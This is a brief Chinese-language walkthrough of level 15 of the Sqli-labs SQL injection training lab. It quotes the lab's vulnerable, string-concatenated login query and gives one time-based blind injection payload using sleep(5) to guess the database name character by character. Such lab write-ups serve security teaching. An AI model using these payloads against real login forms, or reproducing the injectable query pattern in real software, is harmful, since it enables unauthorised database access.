Sqli-labs less 15

Less-15

本关没有错误提示，那么我们只能靠猜测进行注入。这里我直接从源代码中看到了sql语句

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

那这里对id进行 ' id' 的处理。

本关我们利用延时注入进行。

猜测数据库名第一位：

uname=admin'and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&passwd=11&submit=Submit

正确的时候可以直接登录，不正确的时候延时5秒。

其他的payload自行构造。